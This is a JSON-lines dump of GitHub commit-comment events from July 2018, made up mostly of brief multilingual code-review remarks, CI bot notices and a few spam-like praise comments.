{"id":"8001871812","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796128,"position":5,"line":5,"path":"part2/quadratic_equation.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T06:06:01Z","updated_at":"2018-07-23T06:06:01Z","author_association":"NONE","body":"Тут вполне можно обойтись стандартным кернеловским gets. Насколько я понимаю разница между ними только в том, что gets из Kernel может принимать аргументы. (а может и без них работать). В остальном они работают одинаково. А если 2 вещи работают одинаково, то зачем писать больше?"}},"created_at":"2018-07-23T06:06:01Z"}
{"id":"8001876833","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29796132,"position":null,"line":null,"path":null,"commit_id":"def17aa26cb76252f48fedcced980ef68a09a957","created_at":"2018-07-23T06:07:36Z","updated_at":"2018-07-23T06:07:36Z","author_association":"CONTRIBUTOR","body":"이야기 길어져서 슬랙DM으로 드릴께요."}},"created_at":"2018-07-23T06:07:36Z"}
{"id":"8001881848","type":"CommitCommentEvent","actor":{"login":"arunselva123"},"repo":{"name":"arunselva123/pythonp"},"payload":{"comment":{"id":29796138,"position":null,"line":null,"path":null,"commit_id":"a649d3a71af5f927f845a32d68867540f33fb314","created_at":"2018-07-23T06:09:20Z","updated_at":"2018-07-23T06:09:20Z","author_association":"OWNER","body":"def reverse_a_string_more_slowly(a_string):\r\n    new_strings = []\r\n    index = len(a_string)\r\n    while index:\r\n        index -= 1                       \r\n        new_strings.append(a_string[index])\r\n    return ''.join(new_strings)"}},"created_at":"2018-07-23T06:09:20Z"}
{"id":"8001881852","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796139,"position":15,"line":15,"path":"part2/right_triangle.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T06:09:20Z","updated_at":"2018-07-23T06:09:20Z","author_association":"NONE","body":"см quadrantic_equation"}},"created_at":"2018-07-23T06:09:20Z"}
{"id":"8001887686","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796145,"position":34,"line":34,"path":"part2/right_triangle.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T06:11:15Z","updated_at":"2018-07-23T06:11:15Z","author_association":"NONE","body":"По ТЗ нам проверку на равнобедренность нужно делать только в случае равнобедренного треугольника.\r\n\"Также, если треугольник является при этом равнобедренным\""}},"created_at":"2018-07-23T06:11:15Z"}
{"id":"8001889725","type":"CommitCommentEvent","actor":{"login":"G1rneaL"},"repo":{"name":"G1rneaL/G1rneaL.github.io"},"payload":{"comment":{"id":29796149,"position":null,"line":null,"path":null,"commit_id":"4064334223e713031eaa9ddc25a5ed8d6de7e6be","created_at":"2018-07-23T06:11:58Z","updated_at":"2018-07-23T06:11:58Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-23T06:11:58Z"}
{"id":"8001893693","type":"CommitCommentEvent","actor":{"login":"Younus8700"},"repo":{"name":"shiplu/bdzipdb"},"payload":{"comment":{"id":29796152,"position":null,"line":null,"path":null,"commit_id":"8c4d5056844609be302376ed6c91e98edea12c93","created_at":"2018-07-23T06:13:19Z","updated_at":"2018-07-23T06:13:19Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-23T06:13:19Z"}
{"id":"8001895636","type":"CommitCommentEvent","actor":{"login":"gelomarc"},"repo":{"name":"BartoszChrzuszcz/FirstTests"},"payload":{"comment":{"id":29796154,"position":20,"line":20,"path":"FirstTests/TestClass.cs","commit_id":"82aa1e2cf6850ebccb71c29dbfb9697f47ab956e","created_at":"2018-07-23T06:13:53Z","updated_at":"2018-07-23T06:13:53Z","author_association":"NONE","body":"You can use \"@\" sign before path, so you won't be needed double \"/\" signs anymore."}},"created_at":"2018-07-23T06:13:53Z"}
{"id":"8001897982","type":"CommitCommentEvent","actor":{"login":"Wang-Yue"},"repo":{"name":"RoPieee/ropieee-kernel"},"payload":{"comment":{"id":29796159,"position":null,"line":null,"path":null,"commit_id":"13df7e0d76ded69cc477835c73b4fede2655fcc2","created_at":"2018-07-23T06:14:43Z","updated_at":"2018-07-23T06:14:43Z","author_association":"NONE","body":"this is really good. Do you plan to submit a PR to upstream?"}},"created_at":"2018-07-23T06:14:43Z"}
{"id":"8001898062","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796160,"position":39,"line":39,"path":"part2/right_triangle.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T06:14:45Z","updated_at":"2018-07-23T06:14:45Z","author_association":"NONE","body":"Тут для читаемости можно заменить i на cathetus, что-б по лучше отразить, что именно происходит в коде. И лучше использовать оператор возведения в степень. "}},"created_at":"2018-07-23T06:14:45Z"}
{"id":"8001900575","type":"CommitCommentEvent","actor":{"login":"gelomarc"},"repo":{"name":"BartoszChrzuszcz/FirstTests"},"payload":{"comment":{"id":29796165,"position":8,"line":30,"path":"FirstTests/TestClass.cs","commit_id":"c4962fae7917ebc918d2ca1e34a71a15d7faf04b","created_at":"2018-07-23T06:15:34Z","updated_at":"2018-07-23T06:15:34Z","author_association":"NONE","body":"You don't have to add \"//\" at end of comment"}},"created_at":"2018-07-23T06:15:34Z"}
{"id":"8001901125","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29796168,"position":null,"line":null,"path":null,"commit_id":"a2e07390bb469c4ab8005fe6f61fc307aef1f78f","created_at":"2018-07-23T06:15:46Z","updated_at":"2018-07-23T06:15:46Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-23T06:15:46Z"}
{"id":"8001901149","type":"CommitCommentEvent","actor":{"login":"LuisFerGeronimo"},"repo":{"name":"LuisFerGeronimo/SGA-Android"},"payload":{"comment":{"id":29796169,"position":null,"line":null,"path":null,"commit_id":"cadda1af1421adf2d41ead478fe7b0fdbc704dbf","created_at":"2018-07-23T06:15:47Z","updated_at":"2018-07-23T06:15:47Z","author_association":"OWNER","body":"## Nuevas Tablas y Vistas en BD | Nuevos Contratos | Funciones de inserción\r\n\r\n### Nuevas Vistas/Tablas y Contratos\r\n\r\n1. **\"EstructuraDeClaseView\"** -> **EstructuraDeClaseViewContract.java**\r\n2. **\"AlumnoAClaseView\"** -> **AlumnoAClaseViewContract.java**\r\n3. **\"Alumno_Grupo\"** -> **AlumnoGrupoContract.java**\r\n4. **\"Grupo_Cuatrimestre\"** -> **GrupoCuatrimestreContract.java**\r\n\r\n### Modificaciones en _scriptBaseDeDatos_PHPMyAdmin.sql_\r\n\r\n\r\n1. Se modificaron muchos de los tipos de datos de la base de datos. (Ver imagen del _diagrama .jpg_)\r\n2. Se **quitaron** todas las **Vistas comentadas** de la versión anterior de la BD que no servían/se ocupaban.\r\n3. Se agregó script **CREATE TABLE** _'Alumno_a_CarreraView'_ (y la estructura de la Vista)\r\n4. Se agregó script **CREATE TABLE** _'Alumno_a_ClaseView'_ (y la estructura de la Vista)\r\n5. Se agregó script **CREATE TABLE** _'Alumno_GrupoView'_ (y la estructura de la Vista)\r\n6. Se agregó script **CREATE TABLE** _'EstructuraDeClaseView'_ (y la estructura de la Vista)\r\n7. Se agregó script **CREATE TABLE** _'Foto'_\r\n8. Se agregó script **CREATE TABLE** _'Grupo_a_CarreraView'_ (y la estructura de la Vista)\r\n9. Se cambió el tipo de dato de Horario.**horaInicial** Y Horario.**horaFinal** de \"date\" a \"**int**\".\r\n10. Se cambiaron los valores de 'horaInicial' y 'horaFinal' a **int** en **MINUTOS** (e.g. de **'13:00:00'  a  780** [13*60=780])\r\n11. Se agregaron modificaron los KEY's en las tablas:\r\n\t- Administrador\r\n\t- Alumno\r\n\t- Foto\r\n\t- Profesor\r\n\r\n\r\n### Mejoras en _MainActivity.java_\r\n\r\n- Se agregó el código para extraer todos los datos del .JSON.\r\n- Se agregaron las funciones para la insertar los datos del JSON a la BD SQLite.\r\n- Se agregaron funciones para checar si algún registro ya está en la BD SQLite.\r\n\r\n### Modificaciones en _AppDatabase.java_ y _*****Contract.java_\r\n\r\n- Se quitaron todos los query's para crear las tablas y vistas, y se pasaron a los contratos respectivos."}},"created_at":"2018-07-23T06:15:47Z"}
{"id":"8001901323","type":"CommitCommentEvent","actor":{"login":"msmalik681"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29796170,"position":null,"line":null,"path":null,"commit_id":"e8b8d1cefdf9499c90b3a91354f8ea69bf9d083a","created_at":"2018-07-23T06:15:50Z","updated_at":"2018-07-23T06:15:50Z","author_association":"COLLABORATOR","body":"This will be useful thanks @whitedragon0000"}},"created_at":"2018-07-23T06:15:50Z"}
{"id":"8001906492","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796173,"position":41,"line":41,"path":"part2/right_triangle.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T06:17:33Z","updated_at":"2018-07-23T06:17:33Z","author_association":"NONE","body":"Когда у нас добавится проверка на равнобедренность, лучше не делать ее вложенным ифом, а решить используя elsif. Мы просим избегать вложенных условий, когда это возможно."}},"created_at":"2018-07-23T06:17:33Z"}
{"id":"8001908424","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29796177,"position":15,"line":15,"path":"part2/triangle_area.rb","commit_id":"179aa3095225db18c154341ce318671e027f8ff3","created_at":"2018-07-23T06:18:13Z","updated_at":"2018-07-23T06:18:13Z","author_association":"NONE","body":"см quadrantic_equation\r\n\r\n"}},"created_at":"2018-07-23T06:18:13Z"}
{"id":"8001914210","type":"CommitCommentEvent","actor":{"login":"HidetoNakasone"},"repo":{"name":"HidetoNakasone/mao-seminar"},"payload":{"comment":{"id":29796197,"position":null,"line":null,"path":null,"commit_id":"e4cb3351a4699dec2cf44b55849d07b174b36c50","created_at":"2018-07-23T06:20:02Z","updated_at":"2018-07-23T06:20:02Z","author_association":"OWNER","body":"README.mbにメンバー一覧を追加"}},"created_at":"2018-07-23T06:20:02Z"}
{"id":"8001914309","type":"CommitCommentEvent","actor":{"login":"17VB"},"repo":{"name":"raspberrypilearning/shapes"},"payload":{"comment":{"id":29796198,"position":null,"line":null,"path":null,"commit_id":"7c9452d58700e600ff70b4359f441d03d962fbb5","created_at":"2018-07-23T06:20:04Z","updated_at":"2018-07-23T06:20:04Z","author_association":"NONE","body":"Hi Martin i am doing course on Future Learn OOP in  Python i have opne query while \"importing shapes \" in IDLE 3.6.5 i keep on getting error \"No module named 'shapes' \" can you assist me in resolving this error..i am kind of stuck and i want to complete shapes lab prior moving to next lecture."}},"created_at":"2018-07-23T06:20:04Z"}
{"id":"8001946268","type":"CommitCommentEvent","actor":{"login":"Norbert1982"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29796227,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T06:30:12Z","updated_at":"2018-07-23T06:30:12Z","author_association":"NONE","body":"A grandiose project and a great Team "}},"created_at":"2018-07-23T06:30:12Z"}
{"id":"8001948016","type":"CommitCommentEvent","actor":{"login":"skyyezq"},"repo":{"name":"skyyezq/testgit2"},"payload":{"comment":{"id":29796230,"position":null,"line":null,"path":null,"commit_id":"3de4c29765d3b0194ec4ec88ff4f34a14ad74e79","created_at":"2018-07-23T06:30:44Z","updated_at":"2018-07-23T06:30:44Z","author_association":"OWNER","body":"test git try again2"}},"created_at":"2018-07-23T06:30:44Z"}
{"id":"8001951736","type":"CommitCommentEvent","actor":{"login":"Norbert1982"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29796236,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T06:31:56Z","updated_at":"2018-07-23T06:31:56Z","author_association":"NONE","body":"I think it will have a big success Worldwide "}},"created_at":"2018-07-23T06:31:56Z"}
{"id":"8001955717","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29796242,"position":null,"line":null,"path":null,"commit_id":"c14d3fa6c837cdfef3360d62d4e6ea64da5c626b","created_at":"2018-07-23T06:33:12Z","updated_at":"2018-07-23T06:33:12Z","author_association":"OWNER","body":"it will... hasn't been added to zergpools api yet"}},"created_at":"2018-07-23T06:33:12Z"}
{"id":"8001966841","type":"CommitCommentEvent","actor":{"login":"humanova"},"repo":{"name":"humanova/Hmn-Bot"},"payload":{"comment":{"id":29796250,"position":null,"line":null,"path":null,"commit_id":"d805648d656c18a09f096e62697b93b7dcdd4828","created_at":"2018-07-23T06:36:33Z","updated_at":"2018-07-23T06:36:33Z","author_association":"OWNER","body":"hmnBot_log.txt bos olarak eklendi ama heroku yazdirmadi rip"}},"created_at":"2018-07-23T06:36:33Z"}
{"id":"8001972579","type":"CommitCommentEvent","actor":{"login":"adamansky"},"repo":{"name":"differui/rollup-plugin-sass"},"payload":{"comment":{"id":29796258,"position":null,"line":null,"path":null,"commit_id":"28193a331535e623774694121794f2010899ea66","created_at":"2018-07-23T06:38:20Z","updated_at":"2018-07-23T06:38:20Z","author_association":"NONE","body":"Hello! Here the next `customizedSassOptions.importer` is not called when file does't exists.\r\nSuggest to return `null` here."}},"created_at":"2018-07-23T06:38:20Z"}
{"id":"8001972919","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29796261,"position":null,"line":null,"path":null,"commit_id":"a9b22ebd2cbcaf912d1e82d3430922fb954cacac","created_at":"2018-07-23T06:38:25Z","updated_at":"2018-07-23T06:38:25Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/a9b22ebd2cbcaf912d1e82d3430922fb954cacac#commitcomment-29795514) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/d6c167ee02010c2ac588d243b3517c7511dec89c/daily_2018_7_23/report.md). cc @ararslan"}},"created_at":"2018-07-23T06:38:25Z"}
{"id":"8001976681","type":"CommitCommentEvent","actor":{"login":"krono"},"repo":{"name":"davidswelt/aquamacs-emacs"},"payload":{"comment":{"id":29796268,"position":10,"line":7908,"path":"src/nsterm.m","commit_id":"fe76b32afb21c8ff75d4ae88d18b3d1e9092c5bc","created_at":"2018-07-23T06:39:35Z","updated_at":"2018-07-23T06:39:35Z","author_association":"NONE","body":"This is undefined in the 10.11 SDK (which is probably expected…) \r\n\r\nupstream also saw this: https://lists.gnu.org/archive/html/emacs-devel/2017-07/txtquiwZfnPYp.txt"}},"created_at":"2018-07-23T06:39:35Z"}
{"id":"8001982031","type":"CommitCommentEvent","actor":{"login":"sskppkssx"},"repo":{"name":"sskppkssx/springCloud-Config"},"payload":{"comment":{"id":29796279,"position":null,"line":null,"path":null,"commit_id":"1544202adcc40186801616a77c7467f3dcc12301","created_at":"2018-07-23T06:41:11Z","updated_at":"2018-07-23T06:41:11Z","author_association":"OWNER","body":"ymlValue: ymlValue11223334444"}},"created_at":"2018-07-23T06:41:11Z"}
{"id":"8001984939","type":"CommitCommentEvent","actor":{"login":"josh-"},"repo":{"name":"unihackhq/handbook"},"payload":{"comment":{"id":29796285,"position":22,"line":27,"path":"docs/melbourne/event-information/communication.md","commit_id":"2fb981ebd8b9a181155c444b17d20a1c2227eb91","created_at":"2018-07-23T06:42:02Z","updated_at":"2018-07-23T06:42:02Z","author_association":"MEMBER","body":"@erfanio @kochie @dsykesturner @terencehuynh Talked to Ghina who said she didn't create an `#ask-a-mentor` because she was under the impression that this would be covered by the app – do you know our status on this?"}},"created_at":"2018-07-23T06:42:02Z"}
{"id":"8001993390","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/Brainweaver"},"payload":{"comment":{"id":29796303,"position":null,"line":null,"path":null,"commit_id":"93da3dd9a0815db697632cbc28d3cc6ca7b1662f","created_at":"2018-07-23T06:44:28Z","updated_at":"2018-07-23T06:44:28Z","author_association":"OWNER","body":"Dear @JeroenN, you just broke the master branch! Avoid doing that. Breaking the `developer` branch is less of a problem. As a relatively young developer -of course- you are forgiven this time :+1: "}},"created_at":"2018-07-23T06:44:28Z"}
{"id":"8001996361","type":"CommitCommentEvent","actor":{"login":"saadmskkr"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29796312,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T06:45:21Z","updated_at":"2018-07-23T06:45:21Z","author_association":"NONE","body":"Good project with great team and mission.."}},"created_at":"2018-07-23T06:45:21Z"}
{"id":"8001998115","type":"CommitCommentEvent","actor":{"login":"renhong0612"},"repo":{"name":"renhong0612/test"},"payload":{"comment":{"id":29796318,"position":4,"line":4,"path":".gitignore/test","commit_id":"43a4dac85e4c1bd5035d4ce95f08e80ad5b86891","created_at":"2018-07-23T06:45:53Z","updated_at":"2018-07-23T06:45:53Z","author_association":"OWNER","body":"<meta charset=\"utf-8\" />"}},"created_at":"2018-07-23T06:45:53Z"}
{"id":"8001998581","type":"CommitCommentEvent","actor":{"login":"richelbilderbeek"},"repo":{"name":"richelbilderbeek/Brainweaver"},"payload":{"comment":{"id":29796319,"position":null,"line":null,"path":null,"commit_id":"93da3dd9a0815db697632cbc28d3cc6ca7b1662f","created_at":"2018-07-23T06:46:02Z","updated_at":"2018-07-23T06:46:02Z","author_association":"OWNER","body":"@JeroenN: the error is [here](https://travis-ci.org/richelbilderbeek/Brainweaver/builds/406415444#L2016). Try to fix it and you will have learned something :rainbow: "}},"created_at":"2018-07-23T06:46:02Z"}
{"id":"8002001443","type":"CommitCommentEvent","actor":{"login":"praveenit219"},"repo":{"name":"praveenit219/widget_poc"},"payload":{"comment":{"id":29796323,"position":null,"line":null,"path":null,"commit_id":"69962951e667a7b6e5539709ae080b81076069fe","created_at":"2018-07-23T06:46:58Z","updated_at":"2018-07-23T06:46:58Z","author_association":"OWNER","body":"Html fix"}},"created_at":"2018-07-23T06:46:58Z"}
{"id":"8002001452","type":"CommitCommentEvent","actor":{"login":"renhong0612"},"repo":{"name":"renhong0612/test"},"payload":{"comment":{"id":29796324,"position":6,"line":6,"path":".gitignore/test","commit_id":"43a4dac85e4c1bd5035d4ce95f08e80ad5b86891","created_at":"2018-07-23T06:46:58Z","updated_at":"2018-07-23T06:46:58Z","author_association":"OWNER","body":"<meta charset=\"utf-8\" />"}},"created_at":"2018-07-23T06:46:58Z"}
{"id":"8002005271","type":"CommitCommentEvent","actor":{"login":"HermanRonk"},"repo":{"name":"HermanRonk/Clickfarm"},"payload":{"comment":{"id":29796331,"position":2,"line":3162,"path":"inc/base.js","commit_id":"a02dd0ec0b0fcb7afa6ff3c5c6d77e9d56954342","created_at":"2018-07-23T06:48:10Z","updated_at":"2018-07-23T06:48:10Z","author_association":"OWNER","body":"Ik denk inderdaad dat het in dit geval niet heel veel uit zal maken, maar het is sowieso netter, dus inderdaad even aangepast."}},"created_at":"2018-07-23T06:48:10Z"}
{"id":"8002005737","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29796332,"position":16,"line":28,"path":"CHANGELOG.zh-CN.md","commit_id":"007c7d0ef7cd4bd7fbaa638271ba2969e1c85b9a","created_at":"2018-07-23T06:48:18Z","updated_at":"2018-07-23T06:48:18Z","author_association":"MEMBER","body":"这种描述不够准确和难以理解。\r\n\r\n修复 Drawer 内无法显示弹层组件的问题。"}},"created_at":"2018-07-23T06:48:18Z"}
{"id":"8002007820","type":"CommitCommentEvent","actor":{"login":"tollyx"},"repo":{"name":"tollyx/MOAS-LMS"},"payload":{"comment":{"id":29796335,"position":13,"line":14,"path":"MOAS-LMS/Models/ModuleModel.cs","commit_id":"8afa0ad1ae07c199eaac670e027f4cc4c084be53","created_at":"2018-07-23T06:48:55Z","updated_at":"2018-07-23T06:48:55Z","author_association":"OWNER","body":"Jag vet inte riktigt om det egentligen spelar någon roll i det här fallet, men `{ get; set; }` skall vara kvar"}},"created_at":"2018-07-23T06:48:55Z"}
{"id":"8002009336","type":"CommitCommentEvent","actor":{"login":"tollyx"},"repo":{"name":"tollyx/MOAS-LMS"},"payload":{"comment":{"id":29796338,"position":5,"line":27,"path":"MOAS-LMS/Views/Course/Details.cshtml","commit_id":"8afa0ad1ae07c199eaac670e027f4cc4c084be53","created_at":"2018-07-23T06:49:22Z","updated_at":"2018-07-23T06:49:22Z","author_association":"OWNER","body":"Beskrivningen på kursen ska fortfarande vara kvar"}},"created_at":"2018-07-23T06:49:22Z"}
{"id":"8002011349","type":"CommitCommentEvent","actor":{"login":"punchcutter"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29796344,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-23T06:49:58Z","updated_at":"2018-07-23T06:49:58Z","author_association":"NONE","body":"This only partially works and breaks some existing valid (and frequent) combinations like U+1111F,U+1112D,U+1112A\r\nI think what's in https://github.com/harfbuzz/harfbuzz/issues/539 is correct. There we have \r\n```\r\n11127..11129; Bottom # Mn  [3] CHAKMA VOWEL SIGN A..CHAKMA VOWEL SIGN II\r\n1112D       ; Bottom # Mn      CHAKMA VOWEL SIGN AI\r\n11130       ; Bottom # Mn      CHAKMA VOWEL SIGN OI\r\n```\r\n"}},"created_at":"2018-07-23T06:49:58Z"}
{"id":"8002012654","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29796346,"position":null,"line":null,"path":null,"commit_id":"2d818e51254b8396f50e712a36f7095864ce0dec","created_at":"2018-07-23T06:50:17Z","updated_at":"2018-07-23T06:50:17Z","author_association":"NONE","body":"Dear Vasiliy Aleksandrovich,\r\n\r\nAbout this test: http://tests.stockfishchess.org/tests/view/5b5565330ebc5902bdb84c23\r\n\r\nPlease always test your ideas against the latest master version, as it will help you and us understand your work and make sure that you are not testing obsolete or incompatible ideas.\r\n\r\nTo keep your master branch up-to-date, my advice would be use the script given in the wiki at the top of the https://github.com/glinscott/fishtest/wiki/Creating-my-first-test page -- it is quite convenient, and is used by everybody in the Stockfish developper team, I believe."}},"created_at":"2018-07-23T06:50:17Z"}
{"id":"8002015218","type":"CommitCommentEvent","actor":{"login":"seolhanKim"},"repo":{"name":"l4zyg33k/Microservices4ModernCommerce"},"payload":{"comment":{"id":29796348,"position":1,"line":1,"path":"03-chapter3.markdown","commit_id":"a1dd4a1588b6888cb79fb665905ecc63091c63ce","created_at":"2018-07-23T06:51:01Z","updated_at":"2018-07-23T06:51:01Z","author_association":"NONE","body":"**Level 1: resources**\r\n level1은 전체 애플리케이션과 상호작용하는 것 보다, 특정 리소스(_/Inventory_)와 해당 리소스 내 개체(_product122345_)와의 상호작용을 요구합니다. 자원들은 깔끔하게 마이크로소프트에 다시 연결됩니다.\r\n여기 level1을 통해 인벤토리에 질의하는 방법이 있습니다 :\r\n_HTTP POST to /Inventory/product12345\r\n<queryInventory />_\r\n\r\n_/App_ 이 아닌 _/Inventory_와 상호작용하는 것을 알아 둡니다. 또한, URL 에서 제품(_Product1234_)을 직접 참조하고있습니다.\r\n그리고 당신은 응답 받을 것입니다 :\r\n_200 OK\r\n<inventory level=\"84\" />_\r\n\r\n실제 인벤토리를 점유하기위해서는, 아래와 같이 합니다 :\r\n\r\n_HTTP POST to /Inventory/product12345\r\n\r\n<reserveInventory>\r\n<inventory qty=\"1\" />\r\n</reserveInventory>_\r\n\r\n인벤토리든 인벤토리 점유를 질의하든 관계없이, _/inventory9/product12345_ 만 사용하는 것을 기억해 두십시오. 이는 _/App_으로 처리하는 것 보단 확실히 개선되었지만, 이는 여전히 마이크로서비스를 입력으로 변환하고 올바른 함수로 전달하는 데에 많은 양의 비즈니스 로직을 요구합니다.\r\n"}},"created_at":"2018-07-23T06:51:01Z"}
{"id":"8002016057","type":"CommitCommentEvent","actor":{"login":"HermanRonk"},"repo":{"name":"HermanRonk/Clickfarm"},"payload":{"comment":{"id":29796349,"position":29,"line":29,"path":"back/resources.php","commit_id":"a02dd0ec0b0fcb7afa6ff3c5c6d77e9d56954342","created_at":"2018-07-23T06:51:15Z","updated_at":"2018-07-23T06:51:15Z","author_association":"OWNER","body":"Ah, dat was nog een stukje historie, ik zal het even aanpassen."}},"created_at":"2018-07-23T06:51:15Z"}
{"id":"8002017128","type":"CommitCommentEvent","actor":{"login":"jusabatier"},"repo":{"name":"georchestra/geonetwork"},"payload":{"comment":{"id":29796352,"position":null,"line":null,"path":null,"commit_id":"33ce9791bb2e1aa2539de2d378df9b0602c667aa","created_at":"2018-07-23T06:51:34Z","updated_at":"2018-07-23T06:51:34Z","author_association":"NONE","body":"Maybe problem with the cache, updating to 3.4.3 fix the error."}},"created_at":"2018-07-23T06:51:34Z"}
{"id":"8002026496","type":"CommitCommentEvent","actor":{"login":"saurus1969"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29796362,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T06:54:11Z","updated_at":"2018-07-23T06:54:11Z","author_association":"NONE","body":"He, I understand that time dependent parameter like reductions benefit from a ultra long time control test, but I would think that bounderies of [-3.00, 1.00] bould be more appropieate for a savty check]."}},"created_at":"2018-07-23T06:54:11Z"}
{"id":"8002030855","type":"CommitCommentEvent","actor":{"login":"visaya18"},"repo":{"name":"codecov/codecov-python"},"payload":{"comment":{"id":29796367,"position":null,"line":null,"path":null,"commit_id":"04ec397f03cb7bcca98b6d29b3a11823d1ffcd3c","created_at":"2018-07-23T06:55:22Z","updated_at":"2018-07-23T06:55:22Z","author_association":"NONE","body":"\r\n[Enterprise_Agreement_Payment_Solutions.pdf](https://github.com/codecov/codecov-python/files/2218195/Enterprise_Agreement_Payment_Solutions.pdf)\r\n\r\n"}},"created_at":"2018-07-23T06:55:22Z"}
{"id":"8002037545","type":"CommitCommentEvent","actor":{"login":"PeterStudioWeb"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29796372,"position":null,"line":null,"path":null,"commit_id":"3d25cf3fb796a81f282db25bce319e2f0449028c","created_at":"2018-07-23T06:57:14Z","updated_at":"2018-07-23T06:57:14Z","author_association":"NONE","body":"Why?"}},"created_at":"2018-07-23T06:57:14Z"}
{"id":"8002038582","type":"CommitCommentEvent","actor":{"login":"seolhanKim"},"repo":{"name":"l4zyg33k/Microservices4ModernCommerce"},"payload":{"comment":{"id":29796375,"position":1,"line":1,"path":"03-chapter3.markdown","commit_id":"a1dd4a1588b6888cb79fb665905ecc63091c63ce","created_at":"2018-07-23T06:57:32Z","updated_at":"2018-07-23T06:57:32Z","author_association":"NONE","body":"**Level 2: HTTP verbs**\r\n  Level 2는 Level1보다 약간 향상된 것으로, HTTP 동사를 사용합니다. 지금까지, 모든 HTTP 요청은 데이터 검색 또는 업데이트 여부에 상관없이 POST동사를 사용해왔습니다. HTTP동사는 정확하게 해당 목적을 위해서 만들어졌습니다. HTTP GET은 검색에 사용되고, HTTP PUT/POST는 생성 또는 업데이트에, HTTP DELETE는 삭제에 사용됩니다.\r\n예제로 돌아가자면, 우리는 이제 현재 인벤토리에 질의할 때 제품을 위해 POST 보다 GET을 사용할 것입니다 :\r\n_HTTP GET to /Inventory/product12345\r\n<inventory level=\"84\" />_\r\n\r\n인벤토리 점유는 이전과 같습니다 :\r\n_HTTP POST to /Inventory/product12345\r\n<reserveInventory>\r\n<inventory qty=\"1\" />\r\n</reserveInventory>_\r\n\r\n여기서, HTTP PUT 대 POST를 논의하는 것은 범위를 넘어서기에 생략하며,\r\n새로운 인벤토리 기록을 생성하기위해, 아래와 같이 할 수 있습니다 :\r\n_HTTP POST to /Inventory\r\n<createInventory>\r\n<inventory qty=\"1\" productId=\"product12345\" />\r\n</createInventory>_\r\n\r\n표준화된 HTTP200 OK 응답이 아니라, 아래와 같이 돌려받을 수 있습니다 :\r\n_201 Created\r\nLocation: /Inventory/product12345\r\n<inventory level=\"84\" />_ \r\n\r\n응답에서 반환된 신규 개체 위치로 호출자는 해당 위치의 알림 없이, 새 개체에 프로그래밍 방식으로 접근할 수 있습니다.\r\n비록 이것이 HTTP동사를 도입한다는 점에서 레벨 1보다 향상되었지만, 여전히 그 객체 내 개별적 기능이 아닌 객체를 다루고 있습니다. \r\n"}},"created_at":"2018-07-23T06:57:32Z"}
{"id":"8002042025","type":"CommitCommentEvent","actor":{"login":"0legKot"},"repo":{"name":"0legKot/Godsend"},"payload":{"comment":{"id":29796385,"position":null,"line":null,"path":null,"commit_id":"2465d3c3401269b08a489b10965e1410cdb3a351","created_at":"2018-07-23T06:58:34Z","updated_at":"2018-07-23T06:58:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add roles](https://trello.com/c/hCegfpDb/38-add-roles)"}},"created_at":"2018-07-23T06:58:34Z"}
